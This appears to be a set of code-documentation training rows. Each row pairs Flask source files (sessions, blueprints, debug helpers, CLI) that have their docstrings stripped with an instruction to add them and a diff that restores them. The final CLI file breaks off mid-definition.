#: :meth:`make_null_session` will look here for the class that should
#: be created when a null session is requested. Likewise the
@@ -100,49 +148,125 @@ pickle_based = False
def make_null_session(self, app: Flask) -> NullSession:
+ """Creates a null session which acts as a replacement object if the
+ real session support could not be loaded due to a configuration
+ error. This mainly aids the user experience because the job of the
+ null session is to still support lookup without complaining but
+ modifications are answered with a helpful error message of what
+ failed.
+
+ This creates an instance of :attr:`null_session_class` by default.
+ """
return self.null_session_class()
def is_null_session(self, obj: object) -> bool:
+ """Checks if a given object is a null session. Null sessions are
+ not asked to be saved.
+
+ This checks if the object is an instance of :attr:`null_session_class`
+ by default.
+ """
return isinstance(obj, self.null_session_class)
def get_cookie_name(self, app: Flask) -> str:
+ """The name of the session cookie. Uses``app.config["SESSION_COOKIE_NAME"]``."""
return app.config["SESSION_COOKIE_NAME"] # type: ignore[no-any-return]
def get_cookie_domain(self, app: Flask) -> str | None:
+ """The value of the ``Domain`` parameter on the session cookie. If not set,
+ browsers will only send the cookie to the exact domain it was set from.
+ Otherwise, they will send it to any subdomain of the given value as well.
+
+ Uses the :data:`SESSION_COOKIE_DOMAIN` config.
+
+ .. versionchanged:: 2.3
+ Not set by default, does not fall back to ``SERVER_NAME``.
+ """
return app.config["SESSION_COOKIE_DOMAIN"] # type: ignore[no-any-return]
def get_cookie_path(self, app: Flask) -> str:
+ """Returns the path for which the cookie should be valid. The
+ default implementation uses the value from the ``SESSION_COOKIE_PATH``
+ config var if it's set, and falls back to ``APPLICATION_ROOT`` or
+ uses ``/`` if it's ``None``.
+ """
return app.config["SESSION_COOKIE_PATH"] or app.config["APPLICATION_ROOT"] # type: ignore[no-any-return]
def get_cookie_httponly(self, app: Flask) -> bool:
+ """Returns True if the session cookie should be httponly. This
+ currently just returns the value of the ``SESSION_COOKIE_HTTPONLY``
+ config var.
+ """
return app.config["SESSION_COOKIE_HTTPONLY"] # type: ignore[no-any-return]
def get_cookie_secure(self, app: Flask) -> bool:
+ """Returns True if the cookie should be secure. This currently
+ just returns the value of the ``SESSION_COOKIE_SECURE`` setting.
+ """
return app.config["SESSION_COOKIE_SECURE"] # type: ignore[no-any-return]
def get_cookie_samesite(self, app: Flask) -> str | None:
+ """Return ``'Strict'`` or ``'Lax'`` if the cookie should use the
+ ``SameSite`` attribute. This currently just returns the value of
+ the :data:`SESSION_COOKIE_SAMESITE` setting.
+ """
return app.config["SESSION_COOKIE_SAMESITE"] # type: ignore[no-any-return]
def get_cookie_partitioned(self, app: Flask) -> bool:
+ """Returns True if the cookie should be partitioned. By default, uses
+ the value of :data:`SESSION_COOKIE_PARTITIONED`.
+
+ .. versionadded:: 3.1
+ """
return app.config["SESSION_COOKIE_PARTITIONED"] # type: ignore[no-any-return]
def get_expiration_time(self, app: Flask, session: SessionMixin) -> datetime | None:
+ """A helper method that returns an expiration date for the session
+ or ``None`` if the session is linked to the browser session. The
+ default implementation returns now + the permanent session
+ lifetime configured on the application.
+ """
if session.permanent:
return datetime.now(timezone.utc) + app.permanent_session_lifetime
return None
def should_set_cookie(self, app: Flask, session: SessionMixin) -> bool:
+ """Used by session backends to determine if a ``Set-Cookie`` header
+ should be set for this session cookie for this response. If the session
+ has been modified, the cookie is set. If the session is permanent and
+ the ``SESSION_REFRESH_EACH_REQUEST`` config is true, the cookie is
+ always set.
+
+ This check is usually skipped if the session was deleted.
+
+ .. versionadded:: 0.11
+ """
return session.modified or (
session.permanent and app.config["SESSION_REFRESH_EACH_REQUEST"]
)
def open_session(self, app: Flask, request: Request) -> SessionMixin | None:
+ """This is called at the beginning of each request, after
+ pushing the request context, before matching the URL.
+
+ This must return an object which implements a dictionary-like
+ interface as well as the :class:`SessionMixin` interface.
+
+ This will return ``None`` to indicate that loading failed in
+ some way that is not immediately an error. The request
+ context will fall back to using :meth:`make_null_session`
+ in this case.
+ """
raise NotImplementedError()
def save_session(
self, app: Flask, session: SessionMixin, response: Response
) -> None:
+ """This is called at the end of each request, after generating
+ a response, before removing the request context. It is skipped
+ if :meth:`is_null_session` returns ``True``.
+ """
raise NotImplementedError()
@@ -150,10 +274,17 @@
def _lazy_sha1(string: bytes = b"") -> t.Any:
+ """Don't access ``hashlib.sha1`` until runtime. FIPS builds may not include
+ SHA-1, in which case the import and use as a default would fail before the
+ developer can configure something else.
+ """
return hashlib.sha1(string)
class SecureCookieSessionInterface(SessionInterface):
+ """The default session interface that stores sessions in signed cookies
+ through the :mod:`itsdangerous` module.
+ """
#: the salt that should be applied on top of the secret key for the
#: signing of cookie based sessions.
@@ -251,4 +382,4 @@ partitioned=partitioned,
samesite=samesite,
)
- response.vary.add("Cookie")+ response.vary.add("Cookie")
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/sessions.py |
Document helper functions with docstrings | from __future__ import annotations
import os
import typing as t
from datetime import timedelta
from .cli import AppGroup
from .globals import current_app
from .helpers import send_from_directory
from .sansio.blueprints import Blueprint as SansioBlueprint
from .sansio.blueprints import BlueprintSetupState as BlueprintSetupState # noqa
from .sansio.scaffold import _sentinel
if t.TYPE_CHECKING: # pragma: no cover
from .wrappers import Response
class Blueprint(SansioBlueprint):
def __init__(
self,
name: str,
import_name: str,
static_folder: str | os.PathLike[str] | None = None,
static_url_path: str | None = None,
template_folder: str | os.PathLike[str] | None = None,
url_prefix: str | None = None,
subdomain: str | None = None,
url_defaults: dict[str, t.Any] | None = None,
root_path: str | None = None,
cli_group: str | None = _sentinel, # type: ignore
) -> None:
super().__init__(
name,
import_name,
static_folder,
static_url_path,
template_folder,
url_prefix,
subdomain,
url_defaults,
root_path,
cli_group,
)
#: The Click command group for registering CLI commands for this
#: object. The commands are available from the ``flask`` command
#: once the application has been discovered and blueprints have
#: been registered.
self.cli = AppGroup()
# Set the name of the Click group in case someone wants to add
# the app's commands to another CLI tool.
self.cli.name = self.name
def get_send_file_max_age(self, filename: str | None) -> int | None:
value = current_app.config["SEND_FILE_MAX_AGE_DEFAULT"]
if value is None:
return None
if isinstance(value, timedelta):
return int(value.total_seconds())
return value # type: ignore[no-any-return]
def send_static_file(self, filename: str) -> Response:
if not self.has_static_folder:
raise RuntimeError("'static_folder' must be set to serve static_files.")
# send_file only knows to call get_send_file_max_age on the app,
# call it here so it works for blueprints too.
max_age = self.get_send_file_max_age(filename)
return send_from_directory(
t.cast(str, self.static_folder), filename, max_age=max_age
)
def open_resource(
self, resource: str, mode: str = "rb", encoding: str | None = "utf-8"
) -> t.IO[t.AnyStr]:
if mode not in {"r", "rt", "rb"}:
raise ValueError("Resources can only be opened for reading.")
path = os.path.join(self.root_path, resource)
if mode == "rb":
return open(path, mode) # pyright: ignore
return open(path, mode, encoding=encoding) | --- +++ @@ -53,6 +53,22 @@ self.cli.name = self.name
def get_send_file_max_age(self, filename: str | None) -> int | None:
+ """Used by :func:`send_file` to determine the ``max_age`` cache
+ value for a given file path if it wasn't passed.
+
+ By default, this returns :data:`SEND_FILE_MAX_AGE_DEFAULT` from
+ the configuration of :data:`~flask.current_app`. This defaults
+ to ``None``, which tells the browser to use conditional requests
+ instead of a timed cache, which is usually preferable.
+
+ Note this is a duplicate of the same method in the Flask
+ class.
+
+ .. versionchanged:: 2.0
+ The default configuration is ``None`` instead of 12 hours.
+
+ .. versionadded:: 0.9
+ """
value = current_app.config["SEND_FILE_MAX_AGE_DEFAULT"]
if value is None:
@@ -64,6 +80,17 @@ return value # type: ignore[no-any-return]
def send_static_file(self, filename: str) -> Response:
+ """The view function used to serve files from
+ :attr:`static_folder`. A route is automatically registered for
+ this view at :attr:`static_url_path` if :attr:`static_folder` is
+ set.
+
+ Note this is a duplicate of the same method in the Flask
+ class.
+
+ .. versionadded:: 0.5
+
+ """
if not self.has_static_folder:
raise RuntimeError("'static_folder' must be set to serve static_files.")
@@ -77,6 +104,19 @@ def open_resource(
self, resource: str, mode: str = "rb", encoding: str | None = "utf-8"
) -> t.IO[t.AnyStr]:
+ """Open a resource file relative to :attr:`root_path` for reading. The
+ blueprint-relative equivalent of the app's :meth:`~.Flask.open_resource`
+ method.
+
+ :param resource: Path to the resource relative to :attr:`root_path`.
+ :param mode: Open the file in this mode. Only reading is supported,
+ valid values are ``"r"`` (or ``"rt"``) and ``"rb"``.
+ :param encoding: Open the file with this encoding when opening in text
+ mode. This is ignored when opening in binary mode.
+
+ .. versionchanged:: 3.1
+ Added the ``encoding`` parameter.
+ """
if mode not in {"r", "rt", "rb"}:
raise ValueError("Resources can only be opened for reading.")
@@ -85,4 +125,4 @@ if mode == "rb":
return open(path, mode) # pyright: ignore
- return open(path, mode, encoding=encoding)+ return open(path, mode, encoding=encoding)
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/blueprints.py |
Add concise docstrings to each method | from __future__ import annotations
import typing as t
from jinja2.loaders import BaseLoader
from werkzeug.routing import RequestRedirect
from .blueprints import Blueprint
from .globals import _cv_app
from .sansio.app import App
if t.TYPE_CHECKING:
from .sansio.scaffold import Scaffold
from .wrappers import Request
class UnexpectedUnicodeError(AssertionError, UnicodeError):
class DebugFilesKeyError(KeyError, AssertionError):
def __init__(self, request: Request, key: str) -> None:
form_matches = request.form.getlist(key)
buf = [
f"You tried to access the file {key!r} in the request.files"
" dictionary but it does not exist. The mimetype for the"
f" request is {request.mimetype!r} instead of"
" 'multipart/form-data' which means that no file contents"
" were transmitted. To fix this error you should provide"
' enctype="multipart/form-data" in your form.'
]
if form_matches:
names = ", ".join(repr(x) for x in form_matches)
buf.append(
"\n\nThe browser instead transmitted some file names. "
f"This was submitted: {names}"
)
self.msg = "".join(buf)
def __str__(self) -> str:
return self.msg
class FormDataRoutingRedirect(AssertionError):
def __init__(self, request: Request) -> None:
exc = request.routing_exception
assert isinstance(exc, RequestRedirect)
buf = [
f"A request was sent to '{request.url}', but routing issued"
f" a redirect to the canonical URL '{exc.new_url}'."
]
if f"{request.base_url}/" == exc.new_url.partition("?")[0]:
buf.append(
" The URL was defined with a trailing slash. Flask"
" will redirect to the URL with a trailing slash if it"
" was accessed without one."
)
buf.append(
" Send requests to the canonical URL, or use 307 or 308 for"
" routing redirects. Otherwise, browsers will drop form"
" data.\n\n"
"This exception is only raised in debug mode."
)
super().__init__("".join(buf))
def attach_enctype_error_multidict(request: Request) -> None:
oldcls = request.files.__class__
class newcls(oldcls): # type: ignore[valid-type, misc]
def __getitem__(self, key: str) -> t.Any:
try:
return super().__getitem__(key)
except KeyError as e:
if key not in request.form:
raise
raise DebugFilesKeyError(request, key).with_traceback(
e.__traceback__
) from None
newcls.__name__ = oldcls.__name__
newcls.__module__ = oldcls.__module__
request.files.__class__ = newcls
def _dump_loader_info(loader: BaseLoader) -> t.Iterator[str]:
yield f"class: {type(loader).__module__}.{type(loader).__name__}"
for key, value in sorted(loader.__dict__.items()):
if key.startswith("_"):
continue
if isinstance(value, (tuple, list)):
if not all(isinstance(x, str) for x in value):
continue
yield f"{key}:"
for item in value:
yield f" - {item}"
continue
elif not isinstance(value, (str, int, float, bool)):
continue
yield f"{key}: {value!r}"
def explain_template_loading_attempts(
app: App,
template: str,
attempts: list[
tuple[
BaseLoader,
Scaffold,
tuple[str, str | None, t.Callable[[], bool] | None] | None,
]
],
) -> None:
info = [f"Locating template {template!r}:"]
total_found = 0
blueprint = None
if (ctx := _cv_app.get(None)) is not None and ctx.has_request:
blueprint = ctx.request.blueprint
for idx, (loader, srcobj, triple) in enumerate(attempts):
if isinstance(srcobj, App):
src_info = f"application {srcobj.import_name!r}"
elif isinstance(srcobj, Blueprint):
src_info = f"blueprint {srcobj.name!r} ({srcobj.import_name})"
else:
src_info = repr(srcobj)
info.append(f"{idx + 1:5}: trying loader of {src_info}")
for line in _dump_loader_info(loader):
info.append(f" {line}")
if triple is None:
detail = "no match"
else:
detail = f"found ({triple[1] or '<string>'!r})"
total_found += 1
info.append(f" -> {detail}")
seems_fishy = False
if total_found == 0:
info.append("Error: the template could not be found.")
seems_fishy = True
elif total_found > 1:
info.append("Warning: multiple loaders returned a match for the template.")
seems_fishy = True
if blueprint is not None and seems_fishy:
info.append(
" The template was looked up from an endpoint that belongs"
f" to the blueprint {blueprint!r}."
)
info.append(" Maybe you did not place a template in the right folder?")
info.append(" See https://flask.palletsprojects.com/blueprints/#templates")
app.logger.info("\n".join(info)) | --- +++ @@ -15,9 +15,15 @@
class UnexpectedUnicodeError(AssertionError, UnicodeError):
+ """Raised in places where we want some better error reporting for
+ unexpected unicode or binary data.
+ """
class DebugFilesKeyError(KeyError, AssertionError):
+ """Raised from request.files during debugging. The idea is that it can
+ provide a better error message than just a generic KeyError/BadRequest.
+ """
def __init__(self, request: Request, key: str) -> None:
form_matches = request.form.getlist(key)
@@ -42,6 +48,11 @@
class FormDataRoutingRedirect(AssertionError):
+ """This exception is raised in debug mode if a routing redirect
+ would cause the browser to drop the method or body. This happens
+ when method is not GET, HEAD or OPTIONS and the status code is not
+ 307 or 308.
+ """
def __init__(self, request: Request) -> None:
exc = request.routing_exception
@@ -68,6 +79,12 @@
def attach_enctype_error_multidict(request: Request) -> None:
+ """Patch ``request.files.__getitem__`` to raise a descriptive error
+ about ``enctype=multipart/form-data``.
+
+ :param request: The request to patch.
+ :meta private:
+ """
oldcls = request.files.__class__
class newcls(oldcls): # type: ignore[valid-type, misc]
@@ -115,6 +132,7 @@ ]
],
) -> None:
+ """This should help developers understand what failed"""
info = [f"Locating template {template!r}:"]
total_found = 0
blueprint = None
@@ -158,4 +176,4 @@ info.append(" Maybe you did not place a template in the right folder?")
info.append(" See https://flask.palletsprojects.com/blueprints/#templates")
- app.logger.info("\n".join(info))+ app.logger.info("\n".join(info))
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/debughelpers.py |
Write docstrings that follow conventions | from __future__ import annotations
import ast
import collections.abc as cabc
import importlib.metadata
import inspect
import os
import platform
import re
import sys
import traceback
import typing as t
from functools import update_wrapper
from operator import itemgetter
from types import ModuleType
import click
from click.core import ParameterSource
from werkzeug import run_simple
from werkzeug.serving import is_running_from_reloader
from werkzeug.utils import import_string
from .globals import current_app
from .helpers import get_debug_flag
from .helpers import get_load_dotenv
if t.TYPE_CHECKING:
import ssl
from _typeshed.wsgi import StartResponse
from _typeshed.wsgi import WSGIApplication
from _typeshed.wsgi import WSGIEnvironment
from .app import Flask
class NoAppException(click.UsageError):
def find_best_app(module: ModuleType) -> Flask:
from . import Flask
# Search for the most common names first.
for attr_name in ("app", "application"):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for v in module.__dict__.values() if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
"Detected multiple Flask applications in module"
f" '{module.__name__}'. Use '{module.__name__}:name'"
" to specify the correct one."
)
# Search for app factory functions.
for attr_name in ("create_app", "make_app"):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = app_factory()
if isinstance(app, Flask):
return app
except TypeError as e:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
f"Detected factory '{attr_name}' in module '{module.__name__}',"
" but could not call it without arguments. Use"
f" '{module.__name__}:{attr_name}(args)'"
" to specify arguments."
) from e
raise NoAppException(
"Failed to find Flask application or factory in module"
f" '{module.__name__}'. Use '{module.__name__}:name'"
" to specify one."
)
def _called_with_wrong_args(f: t.Callable[..., Flask]) -> bool:
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is f.__code__:
# In the function, it was called successfully.
return False
tb = tb.tb_next
# Didn't reach the function.
return True
finally:
# Delete tb to break a circular reference.
# https://docs.python.org/2/library/sys.html#sys.exc_info
del tb
def find_app_by_string(module: ModuleType, app_name: str) -> Flask:
from . import Flask
# Parse app_name as a single expression to determine if it's a valid
# attribute name or function call.
try:
expr = ast.parse(app_name.strip(), mode="eval").body
except SyntaxError:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
) from None
if isinstance(expr, ast.Name):
name = expr.id
args = []
kwargs = {}
elif isinstance(expr, ast.Call):
# Ensure the function name is an attribute name only.
if not isinstance(expr.func, ast.Name):
raise NoAppException(
f"Function reference must be a simple name: {app_name!r}."
)
name = expr.func.id
# Parse the positional and keyword arguments as literals.
try:
args = [ast.literal_eval(arg) for arg in expr.args]
kwargs = {
kw.arg: ast.literal_eval(kw.value)
for kw in expr.keywords
if kw.arg is not None
}
except ValueError:
# literal_eval gives cryptic error messages, show a generic
# message with the full expression instead.
raise NoAppException(
f"Failed to parse arguments as literal values: {app_name!r}."
) from None
else:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
)
try:
attr = getattr(module, name)
except AttributeError as e:
raise NoAppException(
f"Failed to find attribute {name!r} in {module.__name__!r}."
) from e
# If the attribute is a function, call it with any args and kwargs
# to get the real application.
if inspect.isfunction(attr):
try:
app = attr(*args, **kwargs)
except TypeError as e:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
f"The factory {app_name!r} in module"
f" {module.__name__!r} could not be called with the"
" specified arguments."
) from e
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
"A valid Flask application was not obtained from"
f" '{module.__name__}:{app_name}'."
)
def prepare_import(path: str) -> str:
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
if ext == ".py":
path = fname
if os.path.basename(path) == "__init__":
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, "__init__.py")):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return ".".join(module_name[::-1])
@t.overload
def locate_app(
module_name: str, app_name: str | None, raise_if_not_found: t.Literal[True] = True
) -> Flask: ...
@t.overload
def locate_app(
module_name: str, app_name: str | None, raise_if_not_found: t.Literal[False] = ...
) -> Flask | None: ...
def locate_app(
module_name: str, app_name: str | None, raise_if_not_found: bool = True
) -> Flask | None:
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[2].tb_next: # type: ignore[union-attr]
raise NoAppException(
f"While importing {module_name!r}, an ImportError was"
f" raised:\n\n{traceback.format_exc()}"
) from None
elif raise_if_not_found:
raise NoAppException(f"Could not import {module_name!r}.") from None
else:
return None
module = sys.modules[module_name]
if app_name is None:
return find_best_app(module)
else:
return find_app_by_string(module, app_name)
def get_version(ctx: click.Context, param: click.Parameter, value: t.Any) -> None:
if not value or ctx.resilient_parsing:
return
flask_version = importlib.metadata.version("flask")
werkzeug_version = importlib.metadata.version("werkzeug")
click.echo(
f"Python {platform.python_version()}\n"
f"Flask {flask_version}\n"
f"Werkzeug {werkzeug_version}",
color=ctx.color,
)
ctx.exit()
version_option = click.Option(
["--version"],
help="Show the Flask version.",
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True,
)
class ScriptInfo:
def __init__(
self,
app_import_path: str | None = None,
create_app: t.Callable[..., Flask] | None = None,
set_debug_flag: bool = True,
load_dotenv_defaults: bool = True,
) -> None:
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data: dict[t.Any, t.Any] = {}
self.set_debug_flag = set_debug_flag
self.load_dotenv_defaults = get_load_dotenv(load_dotenv_defaults)
"""Whether default ``.flaskenv`` and ``.env`` files should be loaded.
``ScriptInfo`` doesn't load anything, this is for reference when doing
the load elsewhere during processing.
.. versionadded:: 3.1
"""
self._loaded_app: Flask | None = None
def load_app(self) -> Flask:
if self._loaded_app is not None:
return self._loaded_app
app: Flask | None = None
if self.create_app is not None:
app = self.create_app()
else:
if self.app_import_path:
path, name = (
re.split(r":(?![\\/])", self.app_import_path, maxsplit=1) + [None]
)[:2]
import_name = prepare_import(path)
app = locate_app(import_name, name)
else:
for path in ("wsgi.py", "app.py"):
import_name = prepare_import(path)
app = locate_app(import_name, None, raise_if_not_found=False)
if app is not None:
break
if app is None:
raise NoAppException(
"Could not locate a Flask application. Use the"
" 'flask --app' option, 'FLASK_APP' environment"
" variable, or a 'wsgi.py' or 'app.py' file in the"
" current directory."
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
F = t.TypeVar("F", bound=t.Callable[..., t.Any])
def with_appcontext(f: F) -> F:
@click.pass_context
def decorator(ctx: click.Context, /, *args: t.Any, **kwargs: t.Any) -> t.Any:
if not current_app:
app = ctx.ensure_object(ScriptInfo).load_app()
ctx.with_resource(app.app_context())
return ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f) # type: ignore[return-value]
class AppGroup(click.Group):
def command( # type: ignore[override]
self, *args: t.Any, **kwargs: t.Any
) -> t.Callable[[t.Callable[..., t.Any]], click.Command]:
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f: t.Callable[..., t.Any]) -> click.Command:
if wrap_for_ctx:
f = with_appcontext(f)
return super(AppGroup, self).command(*args, **kwargs)(f) # type: ignore[no-any-return]
return decorator
def group( # type: ignore[override]
self, *args: t.Any, **kwargs: t.Any
) -> t.Callable[[t.Callable[..., t.Any]], click.Group]:
kwargs.setdefault("cls", AppGroup)
return super().group(*args, **kwargs) # type: ignore[no-any-return]
def _set_app(ctx: click.Context, param: click.Option, value: str | None) -> str | None:
if value is None:
return None
info = ctx.ensure_object(ScriptInfo)
info.app_import_path = value
return value
# This option is eager so the app will be available if --help is given.
# --help is also eager, so --app must be before it in the param list.
# no_args_is_help bypasses eager processing, so this option must be
# processed manually in that case to ensure FLASK_APP gets picked up.
_app_option = click.Option(
["-A", "--app"],
metavar="IMPORT",
help=(
"The Flask application or factory function to load, in the form 'module:name'."
" Module can be a dotted import or file path. Name is not required if it is"
" 'app', 'application', 'create_app', or 'make_app', and can be 'name(args)' to"
" pass arguments."
),
is_eager=True,
expose_value=False,
callback=_set_app,
)
def _set_debug(ctx: click.Context, param: click.Option, value: bool) -> bool | None:
# If the flag isn't provided, it will default to False. Don't use
# that, let debug be set by env in that case.
source = ctx.get_parameter_source(param.name) # type: ignore[arg-type]
if source is not None and source in (
ParameterSource.DEFAULT,
ParameterSource.DEFAULT_MAP,
):
return None
# Set with env var instead of ScriptInfo.load so that it can be
# accessed early during a factory function.
os.environ["FLASK_DEBUG"] = "1" if value else "0"
return value
_debug_option = click.Option(
["--debug/--no-debug"],
help="Set debug mode.",
expose_value=False,
callback=_set_debug,
)
def _env_file_callback(
ctx: click.Context, param: click.Option, value: str | None
) -> str | None:
try:
import dotenv # noqa: F401
except ImportError:
# Only show an error if a value was passed, otherwise we still want to
# call load_dotenv and show a message without exiting.
if value is not None:
raise click.BadParameter(
"python-dotenv must be installed to load an env file.",
ctx=ctx,
param=param,
) from None
# Load if a value was passed, or we want to load default files, or both.
if value is not None or ctx.obj.load_dotenv_defaults:
load_dotenv(value, load_defaults=ctx.obj.load_dotenv_defaults)
return value
# This option is eager so env vars are loaded as early as possible to be
# used by other options.
_env_file_option = click.Option(
["-e", "--env-file"],
type=click.Path(exists=True, dir_okay=False),
help=(
"Load environment variables from this file, taking precedence over"
" those set by '.env' and '.flaskenv'. Variables set directly in the"
" environment take highest precedence. python-dotenv must be installed."
),
is_eager=True,
expose_value=False,
callback=_env_file_callback,
)
class FlaskGroup(AppGroup):
def __init__(
self,
add_default_commands: bool = True,
create_app: t.Callable[..., Flask] | None = None,
add_version_option: bool = True,
load_dotenv: bool = True,
set_debug_flag: bool = True,
**extra: t.Any,
) -> None:
params: list[click.Parameter] = list(extra.pop("params", None) or ())
# Processing is done with option callbacks instead of a group
# callback. This allows users to make a custom group callback
# without losing the behavior. --env-file must come first so
# that it is eagerly evaluated before --app.
params.extend((_env_file_option, _app_option, _debug_option))
if add_version_option:
params.append(version_option)
if "context_settings" not in extra:
extra["context_settings"] = {}
extra["context_settings"].setdefault("auto_envvar_prefix", "FLASK")
super().__init__(params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self) -> None:
if self._loaded_plugin_commands:
return
for ep in importlib.metadata.entry_points(group="flask.commands"):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx: click.Context, name: str) -> click.Command | None:
self._load_plugin_commands()
# Look up built-in and plugin commands, which should be
# available even if the app fails to load.
rv = super().get_command(ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
# Look up commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
app = info.load_app()
except NoAppException as e:
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
return None
# Push an app context for the loaded app unless it is already
# active somehow. This makes the context available to parameter
# and command callbacks without needing @with_appcontext.
if not current_app or current_app._get_current_object() is not app:
ctx.with_resource(app.app_context())
return app.cli.get_command(ctx, name)
def list_commands(self, ctx: click.Context) -> list[str]:
self._load_plugin_commands()
# Start with the built-in and plugin commands.
rv = set(super().list_commands(ctx))
info = ctx.ensure_object(ScriptInfo)
# Add commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
rv.update(info.load_app().cli.list_commands(ctx))
except NoAppException as e:
# When an app couldn't be loaded, show the error message
# without the traceback.
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
except Exception:
# When any other errors occurred during loading, show the
# full traceback.
click.secho(f"{traceback.format_exc()}\n", err=True, fg="red")
return sorted(rv)
def make_context(
self,
info_name: str | None,
args: list[str],
parent: click.Context | None = None,
**extra: t.Any,
) -> click.Context:
# Set a flag to tell app.run to become a no-op. If app.run was
# not in a __name__ == __main__ guard, it would start the server
# when importing, blocking whatever command is being called.
os.environ["FLASK_RUN_FROM_CLI"] = "true"
if "obj" not in extra and "obj" not in self.context_settings:
extra["obj"] = ScriptInfo(
create_app=self.create_app,
set_debug_flag=self.set_debug_flag,
load_dotenv_defaults=self.load_dotenv,
)
return super().make_context(info_name, args, parent=parent, **extra)
def parse_args(self, ctx: click.Context, args: list[str]) -> list[str]:
if (not args and self.no_args_is_help) or (
len(args) == 1 and args[0] in self.get_help_option_names(ctx)
):
# Attempt to load --env-file and --app early in case they
# were given as env vars. Otherwise no_args_is_help will not
# see commands from app.cli.
_env_file_option.handle_parse_result(ctx, {}, [])
_app_option.handle_parse_result(ctx, {}, [])
return super().parse_args(ctx, args)
def _path_is_ancestor(path: str, other: str) -> bool:
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
def load_dotenv(
path: str | os.PathLike[str] | None = None, load_defaults: bool = True
) -> bool:
try:
import dotenv
except ImportError:
if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"):
click.secho(
" * Tip: There are .env files present. Install python-dotenv"
" to use them.",
fg="yellow",
err=True,
)
return False
data: dict[str, str | None] = {}
if load_defaults:
for default_name in (".flaskenv", ".env"):
if not (default_path := dotenv.find_dotenv(default_name, usecwd=True)):
continue
data |= dotenv.dotenv_values(default_path, encoding="utf-8")
if path is not None and os.path.isfile(path):
data |= dotenv.dotenv_values(path, encoding="utf-8")
for key, value in data.items():
if key in os.environ or value is None:
continue
os.environ[key] = value
return bool(data) # True if at least one env var was loaded.
def show_server_banner(debug: bool, app_import_path: str | None) -> None:
if is_running_from_reloader():
return
if app_import_path is not None:
click.echo(f" * Serving Flask app '{app_import_path}'")
if debug is not None:
click.echo(f" * Debug mode: {'on' if debug else 'off'}")
class CertParamType(click.ParamType):
name = "path"
def __init__(self) -> None:
self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)
def convert(
self, value: t.Any, param: click.Parameter | None, ctx: click.Context | None
) -> t.Any:
try:
import ssl
except ImportError:
raise click.BadParameter(
'Using "--cert" requires Python to be compiled with SSL support.',
ctx,
param,
) from None
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == "adhoc":
try:
import cryptography # noqa: F401
except ImportError:
raise click.BadParameter(
"Using ad-hoc certificates requires the cryptography library.",
ctx,
param,
) from None
return value
obj = import_string(value, silent=True)
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx: click.Context, param: click.Parameter, value: t.Any) -> t.Any:
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
try:
import ssl
except ImportError:
is_context = False
else:
is_context = isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.', ctx, param
)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key" is not used.',
ctx,
param,
)
if not cert:
raise click.BadParameter('"--cert" must also be specified.', ctx, param)
ctx.params["cert"] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter('Required when using "--cert".', ctx, param)
return value
class SeparatedPathType(click.Path):
def convert(
self, value: t.Any, param: click.Parameter | None, ctx: click.Context | None
) -> t.Any:
items = self.split_envvar_value(value)
# can't call no-arg super() inside list comprehension until Python 3.12
super_convert = super().convert
return [super_convert(item, param, ctx) for item in items]
@click.command("run", short_help="Run a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
"--cert",
type=CertParamType(),
help="Specify a certificate file to use HTTPS.",
is_eager=True,
)
@click.option(
"--key",
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key,
expose_value=False,
help="The key file to use when specifying a certificate.",
)
@click.option(
"--reload/--no-reload",
default=None,
help="Enable or disable the reloader. By default the reloader "
